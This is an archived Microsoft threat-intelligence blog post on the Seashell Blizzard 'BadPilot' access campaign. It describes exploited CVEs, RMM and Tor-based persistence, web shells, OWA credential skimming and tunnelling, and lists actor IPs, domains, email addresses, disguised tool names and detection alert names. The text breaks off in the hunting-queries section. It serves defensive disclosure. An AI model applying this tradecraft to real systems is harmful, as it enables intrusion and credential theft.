{ "id": "7f6f8740-f68e-4cc7-9b5f-592c7e153b36", "created_at": "2026-04-06T00:18:36.333519Z", "updated_at": "2026-04-10T13:13:05.297847Z", "deleted_at": null, "sha1_hash": "614ba46c4d82bf61c82ae27fc13348aa15b87319", "title": "The BadPilot campaign: Seashell Blizzard subgroup conducts multiyear global access operation | Microsoft Security Blog", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1701414, "plain_text": "The BadPilot campaign: Seashell Blizzard subgroup conducts\r\nmultiyear global access operation | Microsoft Security Blog\r\nBy Microsoft Threat Intelligence\r\nPublished: 2025-02-12 · Archived: 2026-04-05 18:18:09 UTC\r\nMicrosoft is publishing for the first time our research into a subgroup within the Russian state actor Seashell\r\nBlizzard and its multiyear initial access operation, tracked by Microsoft Threat Intelligence as the “BadPilot\r\ncampaign”. This subgroup has conducted globally diverse compromises of Internet-facing infrastructure to enable\r\nSeashell Blizzard to persist on high-value targets and support tailored network operations. This blog details this\r\nsubgroup’s recently observed tactics, techniques, and procedures (TTPs), and describes three of its distinct\r\nexploitation patterns. The geographical targeting to a near-global scale of this campaign expands Seashell\r\nBlizzard’s scope of operations beyond Eastern Europe. Additionally, the opportunistic access methods outlined in\r\nthis campaign will continue to offer Russia opportunities for niche operations and activities.\r\nActive since at least 2021, this subgroup within Seashell Blizzard has leveraged opportunistic access techniques\r\nand stealthy forms of persistence to collect credentials, achieve command execution, and support lateral\r\nmovement that has at times led to substantial regional network compromises. Observed operations following\r\ninitial access indicate that this campaign enabled Seashell Blizzard to obtain access to global targets across\r\nsensitive sectors including energy, oil and gas, telecommunications, shipping, arms manufacturing, in addition to\r\ninternational governments. We assess that this subgroup has been enabled by a horizontally scalable capability\r\nbolstered by published exploits that allowed Seashell Blizzard to discover and compromise numerous Internet-facing systems across a wide range of geographical regions and sectors. Since early 2024, the subgroup has\r\nexpanded its range of access to include targets in the United States and United Kingdom by exploiting\r\nvulnerabilities primarily in ConnectWise ScreenConnect (CVE-2024-1709) IT remote management and\r\nmonitoring software and Fortinet FortiClient EMS security software (CVE-2023-48788). These new access\r\noperations built upon previous efforts between 2021 and 2023 which predominantly affected Ukraine, Europe, and\r\nspecific verticals in Central and South Asia, and the Middle East.\r\nMicrosoft Threat Intelligence assesses that while some of the subgroup’s targeting is opportunistic, its\r\ncompromises cumulatively offer Seashell Blizzard options when responding to Russia’s evolving strategic\r\nobjectives. Since April 2022, Russia-aligned threat actors have increasingly targeted international organizations\r\nthat are either geopolitically significant or provide military and/or political support to Ukraine. In addition to\r\nestablishing access to these targets outside Ukraine, we assess that the subgroup has likely enabled at least three\r\ndestructive cyberattacks in Ukraine since 2023 (see below discussion of Seashell Blizzard for more information\r\nabout their activities against Ukraine).  \r\nSeashell Blizzard’s far-reaching access operations pose a significant risk to organizations within the group’s\r\nstrategic purview. Despite the commodity nature of this subgroup’s exploitation patterns, notable shifts within the\r\nactor’s post-compromise tradecraft are reflected within the subgroup’s activities, which may carry over to other\r\nhttps://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/?ref=thestack.technology\r\nPage 1 of 19\n\naspects of Seashell Blizzard’s more traditional operations and carry more significant implications for auditing\r\nduring incident response. \r\nMicrosoft Threat Intelligence tracks campaigns launched by Seashell Blizzard as well as this subgroup, and when\r\nable, directly notifies customers who have been targeted or compromised, providing them with the necessary\r\ninformation to help secure their environments. As part of our continuous monitoring, analysis, and reporting on\r\nthe threat landscape, we are sharing our research on this campaign’s activity to raise awareness of the observed\r\nTTPs and to educate organizations on how to harden their attack surfaces against this and similar activity. \r\nWho is Seashell Blizzard?\r\nSeashell Blizzard is a high-impact threat actor linked to the Russian Federation that conducts global activities on\r\nbehalf of Russian Military Intelligence Unit 74455 (GRU). Seashell Blizzard’s specialized operations have ranged\r\nfrom espionage to information operations and cyber-enabled disruptions, usually in the form of destructive attacks\r\nand manipulation of industrial control systems (ICS). Active since at least 2013, this threat actor’s prolific\r\noperations include destructive attacks such as KillDisk (2015) and FoxBlade (2022), supply-chain attacks\r\n(MeDoc, 2017), and pseudo-ransomware attacks such as NotPetya (2017) and Prestige (2022), in addition to\r\nnumerous other specialized disruptive capabilities. Seashell Blizzard is assessed to be highly skilled at enabling\r\nbroad and persistent access against priority computer networks, which sometimes gives the group significant\r\ntenure for future potential follow-on activity.\r\nDue to their specialization in computer network exploitation (CNE) and expertise targeting critical infrastructure\r\nsuch as ICS and supervisory control and data acquisition systems (SCADA), Seashell Blizzard’s operations have\r\nfrequently been leveraged during military conflicts and as an adaptable element during contentious geopolitical\r\nevents. Historically, some of Seashell Blizzard’s operations may be considered part of a spectrum of retaliatory\r\nactions sometimes used by the Russian Federation. Since Russia’s invasion of Ukraine in 2022, Seashell Blizzard\r\nhas conducted a steady stream of operations complementing Russian military objectives. The threat actor’s\r\nlongstanding strategic targets in the region have included critical infrastructure such as energy and water,\r\ngovernment, military, transportation and logistics, manufacturing, telecommunications, and other supportive\r\ncivilian infrastructure.\r\nSince at least April 2023, Seashell Blizzard has increased targeting of military communities in the region, likely\r\nfor tactical intelligence gain. Their persistent targeting of Ukraine suggests Seashell Blizzard is tasked to obtain\r\nand retain access to high-priority targets to provide the Russian military and Russian government a range of\r\noptions for future actions.\r\nSeashell Blizzard’s network intrusions leverage diverse tradecraft and typically employ a range of common\r\npublicly available tools, including Cobalt Strike and DarkCrystalRAT. Network intrusions linked to the threat\r\nactor have affected multiple tiers of infrastructure, showcasing Seashell Blizzard’s abilities to target end users,\r\nnetwork perimeters, and vertical-specific systems leveraging both publicly available and custom exploits and\r\nmethods.\r\nSince February 2022, Seashell Blizzard has generally taken three approaches to their network intrusions:\r\nhttps://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/?ref=thestack.technology\r\nPage 2 of 19\n\nTargeted: Seashell Blizzard has frequently used tailored mechanisms to access targets, including scanning\r\nand exploitation of specific victim infrastructure, phishing, and modifying legitimate functionality of\r\nexisting systems to either expand network access or obtain confidential information.\r\nOpportunistic: Seashell Blizzard has increasingly used broad exploitation of Internet-facing infrastructure\r\nand distribution of malware implants spread through trojanized software to achieve scalable but\r\nindiscriminate access. In cases where a resulting victim is identified as strategically valuable, Microsoft\r\nThreat Intelligence has observed the threat actor conducting significant post-compromise activities.\r\nHybrid: Seashell Blizzard has very likely gained access to target organizations using a limited supply-chain\r\nattack narrowly focused within Ukraine, an operation that was recently mitigated by the Computer\r\nEmergency Response Team of Ukraine (CERT-UA). Other hybrid methods have included compromise of\r\nregional managed IT service providers, which often afforded regional or vertical-specific access to diverse\r\ntargets.\r\nSeashell Blizzard overlaps with activity tracked by other security vendors as BE2, UAC-0133, Blue Echidna,\r\nSandworm, PHANTOM, BlackEnergy Lite, and APT44.\r\nAttribution assessment\r\nMicrosoft Threat Intelligence assesses that the initial access subgroup is linked to Seashell Blizzard. Despite the\r\nsubgroup’s opportunistic tactics, we are able to distinguish this subgroup due to its consistent use of distinct\r\nexploits, tooling, infrastructure, and late-stage methods used to establish persistence. Moreover, our longstanding\r\nforensic investigation uncovered distinct post-compromise activities, a part of which incorporated specific\r\noperational capabilities and resources chiefly utilized by Seashell Blizzard. We have also observed the initial\r\naccess subgroup to pursue access to an organization prior to a Seashell Blizzard-linked destructive attack.\r\nScope of operations and targeting trends\r\nMicrosoft Threat Intelligence assesses that Seashell Blizzard uses this initial access subgroup to horizontally scale\r\ntheir operations as new exploits are acquired and to sustain persistent access to current and future sectors of\r\ninterest to Russia. This subgroup conducts broad operations against a variety of sectors and geographical areas. In\r\n2022, its primary focus was Ukraine, specifically targeting the energy, retail, education, consulting, and\r\nagriculture sectors. In 2023, it globalized the scope of its compromises, leading to persistent access within\r\nnumerous sectors in the United States, Europe, Central Asia, and the Middle East. It frequently prioritized sectors\r\nthat either provided material support to the war in Ukraine or were geopolitically significant. In 2024, while the\r\nexposure of multiple vulnerabilities likely offered the subgroup more access than ever, it appeared to have honed\r\nits focus to the United States, Canada, Australia, and the United Kingdom.\r\nThis subgroup’s historical pattern of exploitation has also led to the compromise of globally diverse organizations\r\nthat appear to have limited or no utility to Russia’s strategic interests. This pattern suggests the subgroup likely\r\nuses an opportunistic “spray and pray” approach to achieving compromises at scale to increase the likelihood of\r\nacquiring access at targets of interest with limited tailored effort. In cases where a strategically significant target is\r\ncompromised, we have observed significant later post-compromise activity. The geographic focus of the subgroup\r\nfrequently transitions between broad campaigns against multiple geographic targets and a narrow focus on specific\r\nregions or countries, demonstrating the subgroup’s flexibility to pursue unique regional objectives.\r\nhttps://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/?ref=thestack.technology\r\nPage 3 of 19\n\nFigure 1. The geographical spread of the initial access subgroup’s targets\r\nInitial access subgroup opportunistically compromises perimeter infrastructure\r\nusing published CVEs\r\nSince late 2021, Seashell Blizzard has used this initial access subgroup to conduct targeted operations by\r\nexploiting vulnerable Internet-facing infrastructure following discovery through direct scanning and, more\r\nuniquely, use of third-party internet scanning services and knowledge repositories. These exploitation efforts are\r\nfollowed by an operational lifecycle using a consistent set of TTPs to support persistence and lateral movement,\r\nwhich have incrementally evolved to become more evasive over time. Microsoft Threat Intelligence has identified\r\nat least three distinct exploitation patterns and operational behaviors linked to this subgroup, which are described\r\nin more detail below:\r\nhttps://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/?ref=thestack.technology\r\nPage 4 of 19\n\nFigure 2. Seashell Blizzard initial access subgroup operational lifecycle\r\nTo date, at least eight vulnerabilities common within specific categories of server infrastructure typically found on\r\nnetwork perimeters of small office/home office (SOHO) and enterprise networks have been exploited by this\r\nsubgroup:\r\nMicrosoft Exchange (CVE-2021-34473)\r\nZimbra Collaboration (CVE-2022-41352)\r\nOpenFire (CVE-2023-32315)\r\nJetBrains TeamCity (CVE-2023-42793)\r\nMicrosoft Outlook (CVE-2023-23397)\r\nConnectwise ScreenConnect (CVE-2024-1709)\r\nFortinet FortiClient EMS (CVE-2023-48788)\r\nJBOSS (exact CVE is unknown)\r\nIn nearly all cases of successful exploitation, Seashell Blizzard carried out measures to establish long-term\r\npersistence on affected systems. This persistent access is noted in at least three cases to have preceded select\r\ndestructive attacks attributed to Seashell Blizzard, highlighting that the subgroup may periodically enable\r\ndestructive or disruptive attacks.\r\nExploitation patterns\r\nWe have observed the initial access subgroup using three specific exploit patterns:\r\nhttps://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/?ref=thestack.technology\r\nPage 5 of 19\n\nDeployment of remote management and monitoring (RMM) suites for persistence and command\r\nand control (February 24, 2024 – present)\r\nIn early 2024, the initial access subgroup began using RMM suites, which was a novel technique used by Seashell\r\nBlizzard to achieve persistence and command and control (C2). This was first observed when the subgroup\r\nexploited vulnerabilities in ConnectWise ScreenConnect (CVE-2024-1709) and Fortinet FortiClient EMS (CVE-2023-48788). The subgroup then deployed RMM software such as Atera Agent and Splashtop Remote Services.\r\nThe use of RMM software allowed the threat actor to retain critical C2 functions while masquerading as a\r\nlegitimate utility, which made it less likely to be detected than a remote access trojan (RAT). While these TTPs\r\nhave been used by other nation-state threat actors since at least 2022, including by Iranian state actor Mango\r\nSandstorm, the Seashell Blizzard initial access subgroup’s specific techniques are considered distinct.\r\nFigure 3. Use of ScreenConnect to install Atera Agent\r\nDuring the first weeks of this exploitation pattern, the initial access subgroup primarily targeted organizations in\r\nUkraine, the United States, Canada, the United Kingdom, and Australia. It is highly likely that Seashell Blizzard\r\nconducted post-compromise activity at only a limited number of organizations that were part of this initial victim\r\npool. For these organizations, Seashell Blizzard conducted preliminary credential access through multiple means\r\nand deployed at least one custom utility to facilitate remote access and tunneling (see the section on ShadowLink\r\nbelow for more information).\r\nBoth CVE-2024-1709 and CVE-2023-48788 provided the ability to launch arbitrary commands on a vulnerable\r\nserver. Following exploitation, the subgroup used two methods of payload retrieval to install RMM agents on\r\naffected servers:\r\nRetrieval of Atera Agent installers from legitimate agent endpoints – Commonly observed on exploited\r\nScreenConnect servers, Seashell Blizzard used resulting command execution to retrieve Atera installers via\r\nBitsadmin and curl from legitimate installation URLs hosted by Atera.\r\nhttps://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/?ref=thestack.technology\r\nPage 6 of 19\n\nRetrieval of Atera Agent from actor-controlled infrastructure – During exploitation of CVE-2023-\r\n48788 between April 9 and April 10, 2024, Seashell Blizzard retrieved remote agent installers from actor-controlled virtual private server (VPS) infrastructure.\r\nFollowing installation of RMM software, Seashell Blizzard uses the native functionality of the agents to deploy\r\nsecondary tools to help credential acquisition, data exfiltration, and upload of custom utilities to facilitate more\r\nrobust access to compromised systems.\r\nSeashell Blizzard likely uses three primary methods of credential access:\r\nRegistry-based credential access via reg.exe:\r\nCredential access via renamed procdump:\r\nSince RMM agents typically afford an interactive graphical interface, native credential access mechanisms\r\ncommon via task manager were likely also carried out. In addition, credential access via Taskmanager UI\r\nby LSASS process dumping was likely also employed.\r\nDuring Seashell Blizzard intrusions, we observed rclone.exe deployed to affected servers and subsequently used to\r\ncarry out data exfiltration using an actor-supplied configuration file.\r\nAmong a subgroup of victims, Seashell Blizzard carried out unique post-compromise activity, indicating that the\r\nthreat actor sought more durable persistence and direct access. In these cases, Seashell Blizzard deployed\r\nhttps://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/?ref=thestack.technology\r\nPage 7 of 19\n\nOpenSSH with a unique public key, allowing them to access compromised systems using an actor-controlled\r\naccount and credential, in addition to a unique persistence and assured C2 method known to Microsoft Threat\r\nIntelligence as ShadowLink.\r\nFigure 4. How ShadowLink avoids discovery\r\nShadowLink facilitates persistent remote access by configuring a compromised system to be registered as a Tor\r\nhidden service. This is achieved using a combination of Tor service binaries and a unique actor-defined Tor\r\nconfiguration file (referred as the ‘torrc’) configuring the system for remote access. Systems compromised with\r\nShadowLink receive a unique .onion address, making them remotely accessible via the Tor network. This\r\ncapability allows Seashell Blizzard to bypass common exploit patterns of deploying a RAT, which commonly\r\nleverages some form of C2 to actor-controlled infrastructure that are often easily audited and identified by\r\nnetwork administrators. Instead, by relying on Tor hidden services, the compromised system creates a persistent\r\ncircuit to the Tor network, acting as a covert tunnel, effectively cloaking all inbound connections to the affected\r\nasset and limiting exposures from both the actor and victim environment.\r\nShadowLink contains two primary components: a legitimate Tor service binary and a torrc which contains\r\nrequisite configurations for the Tor hidden services address—specifically, port-forwarding for common services\r\nsuch as Remote Desktop Protocol (RDP) and SecureShell (SSH) Protocol. Commonly, Seashell Blizzard has\r\nutilized ShadowLink to redirect inbound connections to the Tor hidden service address to ports for RDP (3389).\r\nShadowLink persisted via a system service:\r\nMicrosoft Threat Intelligence has also observed Forest Blizzard, a separate GRU actor, leveraging similar Tor-based capabilities in their operations.\r\nWeb shell deployment for persistence and C2 (late 2021 – present)\r\nhttps://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/?ref=thestack.technology\r\nPage 8 of 19\n\nSince late 2021, the Seashell Blizzard initial access subgroup has primarily deployed web shells following\r\nsuccessful exploitation to maintain footholds and achieve the ability to execute commands necessary to deploy\r\nsecondary tooling to assist lateral movement. To date, this exploit pattern remains its predominant persistence\r\nmethod. Beginning in mid-2022, this pattern of exploitation enabled unique post-compromise activities against\r\norganizations in Central Asia and Europe, which were likely intended to further Russia’s geopolitical objectives\r\nand preposition against select strategic targets.\r\nFigure 5. Seashell Blizzard exploitation of CVE-2021-34473 and CVE-2022-41352\r\nExploitation of Microsoft Exchange and Zimbra vulnerabilities\r\nMicrosoft Threat Intelligence has identified at least two web shells consistently deployed by this initial access\r\nsubgroup. While web shells can be deployed using a variety of methods, they are most often deployed following\r\nthe exploitation of vulnerabilities allowing remote code execution (RCE) or achieving some level of arbitrary file\r\nupload. In the case of the initial access subgroup, we have observed web shells deployed following exploitation of\r\nvulnerabilities in Microsoft Exchange (CVE-2021-34473) and Zimbra (CVE-2022-41352). In cases where RCE is\r\navailable, the initial access subgroup routinely retrieves web shells from actor-controlled infrastructure. This\r\ninfrastructure can be either legitimate but compromised websites or dedicated actor infrastructure.\r\nWe observed the following web shell retrieval commands being used:\r\nMicrosoft Threat Intelligence has identified a web shell that we assess as exclusive to the initial access subgroup\r\nand is associated with the previously mentioned web shell retrieval patterns. Detected as LocalOlive, this web\r\nshell is identified on compromised perimeter infrastructure and serves as the subgroup’s primary means of\r\nhttps://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/?ref=thestack.technology\r\nPage 9 of 19\n\nachieving C2 and deploying additional utilities to compromised infrastructure. Written in ASPX supporting C#,\r\nthe web shell carries sufficient yet rudimentary functionality to support the following secondary activities:\r\nUpload and download files\r\nRun shell commands\r\nOpen a port (default port is set to TCP 250)\r\nFigure 6. LocalOlive web shell def.aspx\r\nOn October 24, 2022, the initial access subgroup successfully exploited CVE-2022-41352. This Zimbra\r\nCollaborative vulnerability allows a threat actor to deploy web shells and other arbitrary files by sending an email\r\nwith a specially crafted attachment, effectively exploiting an arbitrary file-write vulnerability. The initial access\r\nsubgroup leveraged this vulnerability to deliver a primitive web shell to affected servers, allowing for execution of\r\narbitrary commands.\r\nEmails were sent from the following actor-controlled addresses:\r\nakfcjweiopgjebvh@proton.me\r\nohipfdpoih@proton.me\r\nmiccraftsor@outlook.com\r\namymackenzie147@protonmail.ch\r\nehklsjkhvhbjl@proton.me\r\nMirrowSimps@outlook.com\r\nhttps://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/?ref=thestack.technology\r\nPage 10 of 19\n\nFigure 7. Web shell used during Zimbra exploitation\r\nReconnaissance and fingerprinting\r\nAfter deploying web shells, the initial access subgroup then executes specific sequential commands below likely\r\nused to fingerprint and attribute victim networks; these patterns of behavior may indicate that either operators are\r\nquick to capitalize on compromises or the possible use of automation following successful exploitation.\r\nTunneling utilities deployment\r\nWhen Seashell Blizzard identifies targets of likely strategic value, it often furthers its network compromise by\r\ndeploying tunneling utilities such as Chisel, plink, and rsockstun to established dedicated conduits into affected\r\nnetwork segments.\r\nWhen Chisel is deployed, it often followed multiple naming conventions, including:\r\nMsChSoft.exe\r\nMsNan.exe\r\nMsoft.exe\r\nChisel.exe\r\nWin.exe\r\nMsChs.exe\r\nMicrosoftExchange32.exe\r\nDesk.exe\r\nSys.exe\r\nFor example, the initial access subgroup has used the following tunneling commands:\r\nhttps://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/?ref=thestack.technology\r\nPage 11 of 19\n\nWhen rsockstun is deployed, it has used naming conventions such as Sc.exe.\r\nTunneling launch\r\nWhen establishing tunnels, the initial access subgroup has routinely established reverse tunnels to exclusive VPS\r\nactor-owned infrastructure, including:\r\nTunneling IP First observed used Last observed used\r\n103.201.129[.]130 May 2022 July 2022\r\n104.160.6[.]2 September 2022 December 2022\r\n195.26.87[.]209 September 2023 April 2024\r\nNote that these IP addresses are relevant within or around the timeframes enumerated in the table above. Some IP\r\naddresses may no longer be used by Seashell Blizzard at the time of this writing but are provided for historical and\r\nforensic understanding.\r\nModification of infrastructure to expand network influence through credential collection (late\r\n2021 – 2024)\r\nIn targeted operations where the initial access subgroup is likely seeking network access, Microsoft Threat\r\nIntelligence has observed subsequent malicious modifications to network resources including Outlook Web\r\nAccess (OWA) sign-in pages and DNS configurations.\r\nFigure 8. Simple attack chain for Seashell Blizzard exploitation of OWA\r\nModifying network resources allows Seashell Blizzard to passively gather relevant network credentials, which\r\nmay be used to expand the actor’s access to sensitive information and widen its access to target networks in\r\ngeneral. Notably, the infrastructure associated with this unique technique is sometimes also used in the two prior\r\nhttps://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/?ref=thestack.technology\r\nPage 12 of 19\n\nexploitation patterns, highlighting the versatility of late-stage infrastructure which may not always be limited to\r\ndistinct patterns of exploitation.\r\nModification of web access sign-in portals\r\nThe initial access subgroup uses rogue JavaScript inserted into otherwise legitimate sign-in portals. This malicious\r\nJavaScript collects and sends clear text usernames and passwords to actor-controlled infrastructure as they are\r\nsubmitted in real time by users of the affected organization. We assess that this method has likely afforded the\r\nsubgroup credentials to support lateral movement within several organizations.\r\nMicrosoft Threat Intelligence has tracked the following actor-controlled infrastructure linked to this unique\r\ncredential collection method when modifying legitimate OWA sign-in pages:\r\nhwupdates[.]com\r\ncloud-sync[.]org\r\n103.201.129[.]130\r\nFigure 9. Seashell Blizzard credential collection from OWA\r\nModification of DNS configurations\r\nMicrosoft Threat Intelligence assesses with moderate confidence that the initial access subgroup has modified\r\nDNS A record configurations for select targets. While the purpose of these modifications is unclear, due to the\r\nnature of affected systems, it is possible that they may have been purposed to intercept credentials from critical\r\nauthentication services.\r\nhttps://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/?ref=thestack.technology\r\nPage 13 of 19\n\nConclusion\r\nGiven that Seashell Blizzard is Russia’s cyber tip of the spear in Ukraine, Microsoft Threat Intelligence assesses\r\nthat this access subgroup will continue to innovate new horizontally scalable techniques to compromise networks\r\nboth in Ukraine and globally in support of Russia’s war objectives and evolving national priorities. This subgroup,\r\nwhich is characterized within the broader Seashell Blizzard organization by its near-global reach, represents an\r\nexpansion in both the geographical targeting conducted by Seashell Blizzard and the scope of its operations. At the\r\nsame time, Seashell Blizzard’s far-reaching, opportunistic access methods likely offer Russia expansive\r\nopportunities for niche operations and activities that will continue to be valuable over the medium term.\r\nMitigation and protection guidance\r\nTo harden networks against the Seashell Blizzard activity listed above, defenders can implement the following:\r\nStrengthen operating environment configuration\r\nUtilize a vulnerability management system, such as Microsoft Defender Vulnerability Management, to\r\nmanage vulnerabilities, weaknesses, and remediation efforts across your environment’s operating systems,\r\nsoftware inventories, and network devices.\r\nRequire multifactor authentication (MFA). While certain attacks such as AiTM phishing attempt to\r\ncircumvent MFA, implementation of MFA remains an essential pillar in identity security and is highly\r\neffective at stopping a variety of threats.\r\nLeverage phishing-resistant authentication methods such as FIDO Tokens, or Microsoft\r\nAuthenticator with passkey. Avoid telephony-based MFA methods to avoid risks associated with\r\nSIM-jacking.\r\nImplement Entra ID Conditional Access authentication strength to require phishing-resistant authentication\r\nfor employees and external users for critical apps.\r\nEncourage users to use Microsoft Edge and other web browsers that support Microsoft Defender\r\nSmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites\r\nthat host malware.\r\nOrganizations can also use Microsoft Defender External Attack Surface Management (EASM) , a tool that\r\ncontinuously discovers and maps digital attack surface to provide an external view of your online\r\ninfrastructure. EASM leverages vulnerability and infrastructure data to generate Attack Surface Insights,\r\nreporting that highlights key risks to a given organization.\r\nEnable Network Level Authentication for Remote Desktop Service connections.\r\nEnable AppLocker to restrict specific software tools prohibited within the organization, such as\r\nreconnaissance, fingerprinting, and RMM tools, or grant access to only specific users.\r\nStrengthen Microsoft Defender for Endpoint configuration\r\nEnsure that tamper protection is enabled in Microsoft Defender for Endpoint. \r\nEnable network protection in Microsoft Defender for Endpoint. \r\nTurn on web protection.\r\nhttps://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/?ref=thestack.technology\r\nPage 14 of 19\n\nRun endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can\r\nblock malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when\r\nMicrosoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to\r\nremediate malicious artifacts that are detected post-breach.     \r\nConfigure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint\r\ntake immediate action on alerts to resolve breaches, significantly reducing alert volume.  \r\nMicrosoft Defender XDR customers can turn on the following attack surface reduction rules to prevent\r\ncommon attack techniques used by threat actors. \r\nBlock executable content from email client and webmail \r\nBlock executable files from running unless they meet a prevalence, age, or trusted list criterion \r\nBlock execution of potentially obfuscated scripts\r\nBlock JavaScript or VBScript from launching downloaded executable content\r\nBlock process creations originating from PSExec and WMI commands\r\nStrengthen Microsoft Defender Antivirus configuration\r\nTurn on cloud-delivered protection in Microsoft Defender Antivirus, or the equivalent for your antivirus\r\nproduct, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections\r\nblock a majority of new and unknown variants. \r\nEnable Microsoft Defender Antivirus scanning of downloaded files and attachments.\r\nEnable Microsoft Defender Antivirus real-time protection.\r\nTurn on PUA protection in block mode in Microsoft Defender Antivirus \r\nStrengthen Microsoft Defender for Office 365 configuration\r\nTurn on Safe Links and Safe Attachments in Microsoft Defender for Office 365.\r\nEnable Zero-hour auto purge (ZAP) in Microsoft Defender for Office 365 to quarantine sent mail in\r\nresponse to newly acquired threat intelligence and retroactively neutralize malicious phishing, spam, or\r\nmalware messages that have already been delivered to mailboxes.\r\nInvest in advanced anti-phishing solutions that monitor incoming emails and visited websites. Microsoft\r\nDefender for Office 365 merges incident and alert management across email, devices, and identities,\r\ncentralizing investigations for email-based threats.\r\nConfigure Microsoft Defender for Office 365 to recheck links on click.\r\nUse the Attack Simulator in Microsoft Defender for Office 365 to run realistic, yet safe, simulated phishing\r\nand password attack campaigns. Run spear-phishing (credential harvest) simulations to train end-users\r\nagainst clicking URLs in unsolicited messages and disclosing credentials.\r\nStrengthen Microsoft Defender for Identity configuration\r\nPrevent clear text credential exposure.\r\nReduce lateral movement paths that may be used by attackers.\r\nIdentify legacy components that may introduce security vulnerabilities.\r\nMicrosoft Defender XDR detections\r\nhttps://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/?ref=thestack.technology\r\nPage 15 of 19\n\nMicrosoft Defender Antivirus \r\nMicrosoft Defender Antivirus detects this threat as the following malware: \r\nHackTool:Win64/ShadowLink.A!dha\r\nHackTool:Win64/ShadowLink.B!dha\r\nExploit:Python/CVE-2024-1709\r\nRnasom:Win32/Inc.MA\r\nBackDoor:PHP/Remoteshell.V\r\nTrojan:Win32/LocalOlive.A!dha\r\nTrojan:Win32/LocalOlive.B!dha\r\nTrojan:Win32/LocalOlive.C!dha\r\nMicrosoft Defender for Endpoint\r\nThe following Microsoft Defender for Endpoint alerts can indicate associated threat activity:\r\nSeashell Blizzard activity group\r\nThe following alerts might also indicate threat activity related to this threat. Note, however, these alerts also can\r\nbe triggered by unrelated threat activity.\r\nPossible Seashell Blizzard activity\r\nSuspicious Atera installation via ScreenConnect\r\nSuspicious command execution via ScreenConnect\r\nSuspicious sequence of exploration activities\r\nCredentialDumpingViaEsentutlDetector\r\nSuspicious behavior by cmd.exe was observed\r\nSQL Server login using xp_cmdshell\r\nSuspicious port scan activity within an RDP session\r\nSuspicious connection to remote service\r\nSuspicious usage of remote management software\r\nNew local admin added using Net commands\r\nSensitive data was extracted from registry\r\nSuspicious Scheduled Task Process Launched\r\nPotential human-operated malicious activity\r\nCompromised account conducting hands-on-keyboard attack\r\nSensitive file access for possible data exfiltration or encryption\r\nPossible Fortinet FortiClientEMS vulnerability exploitation\r\nPossible target of NTLM credential theft\r\nPossible exploitation of ProxyShell vulnerabilities\r\nPossibly malicious use of proxy or tunneling tool\r\nHidden dual-use tool launch attempt\r\nMicrosoft Defender for Cloud\r\nhttps://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/?ref=thestack.technology\r\nPage 16 of 19\n\nThe following alerts might also indicate threat activity associated with this threat. These alerts, however, can be\r\ntriggered by unrelated threat activity and are not monitored in the status cards provided with this report.\r\nCommunication with suspicious domain identified by threat intelligence\r\nSuspicious PowerShell Activity Detected\r\nDetected suspicious combination of HTA and PowerShell\r\nDetected encoded executable in command line data\r\nDetected obfuscated command line\r\nThreat intelligence reports\r\nMicrosoft customers can use the following reports in Microsoft products to get the most up-to-date information\r\nabout the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the\r\nintelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated\r\nthreats found in customer environments. Microsoft Security Copilot customers can also use the Microsoft Security\r\nCopilot integration in Microsoft Defender Threat Intelligence to get more information about this threat actor.\r\nMicrosoft Defender Threat Intelligence\r\nSeashell Blizzard\r\nSeashell Blizzard uses new ShadowLink variant\r\nSeashell Blizzard exploiting vulnerabilities to install Atera Agent for post-compromise activities\r\nSeashell Blizzard launches destructive attack against local Ukrainian government, Storm-1512 takes credit\r\nCredential Theft via Modification of Outlook Web Access (OWA) Login Pages\r\nSeashell Blizzard Targeting Zimbra Servers Using Malicious Email Attachment\r\nSeashell Blizzard Uses TOR Hidden Services on Targets for Persistence and Evasion\r\nHunting queries  \r\nMicrosoft Defender XDR\r\nThe following sample queries let you search for a week’s worth of events. To explore up to 30 days’ worth of raw\r\ndata to inspect events in your network and locate potential PowerShell-related indicators for more than a week, go\r\nto the Advanced hunting page \u003e Query tab, select the calendar dropdown menu to update your query to hunt for\r\nthe Last 30 days.\r\nScreenConnect\r\nSurface the possible exploitation of ScreenConnect to launch suspicious 